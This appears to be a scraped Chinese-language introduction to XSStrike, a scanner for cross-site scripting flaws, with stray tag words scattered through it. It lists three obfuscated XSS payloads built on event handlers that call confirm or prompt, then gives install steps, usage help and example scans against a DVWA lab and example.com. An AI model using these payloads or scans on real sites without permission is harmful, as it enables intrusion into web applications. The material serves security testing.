XSStrike是一個Cross Site Scripting檢測套件,配備四個手寫解析器,一個智能有效載荷生成器,一個強大的模糊引擎和一個很是快速的爬蟲。php
XSStrike不是像其餘工具那樣注入有效負載並檢查其工做,而是經過多個解析器分析響應,而後經過與模糊引擎集成的上下文分析來保證有效負載。如下是XSStrike生成的有效負載的一些示例:html
}]};(confirm)()//\ <A%0aONMouseOvER%0d=%0d[8].find(confirm)>z </tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z </SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
除此以外,XSStrike還具備爬行,模糊測試,參數發現,WAF檢測功能。它還會掃描DOM XSS漏洞。python
必須使用pip3安裝必要的庫:git
git clone https://github.com/s0md3v/XSStrike.git cd XSStrike/ pip3 install -r requirements.txt python3 xsstrike.py XSStrike v3.1.1 usage: xsstrike.py [-h] [-u target] [--data paramdata] [-e encode] [--fuzzer] [--update] [--timeout timeout] [--proxy] [--params] [--crawl] [--json] [--path] [--seeds args_seeds] [-f args_file] [-l level] [--headers] [-t threadcount] [-d delay] [--skip] [--skip-dom] [-v] [--blind] optional arguments: -h, --help show this help message and exit -u target, --url target url --data paramdata post data -e encode, --encode encode encode payloads --fuzzer fuzzer --update update --timeout timeout timeout --proxy use prox(y|ies) --params find params --crawl crawl --json treat post data as json --path inject payloads in the path --seeds args_seeds load crawling seeds from a file -f args_file, --file args_file load payloads from a file -l level, --level level level of crawling --headers add headers -t threadcount, --threads threadcount number of threads -d delay, --delay delay delay between requests --skip don't ask to continue --skip-dom skip dom checking -v, --vectors verbose output --blind inject blind xss payload while crawling
python3 xsstrike.py -v -u "http://192.168.118.132/dvwa/vulnerabilities/xss_r/?name=test#" --fuzzer --header
github
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
json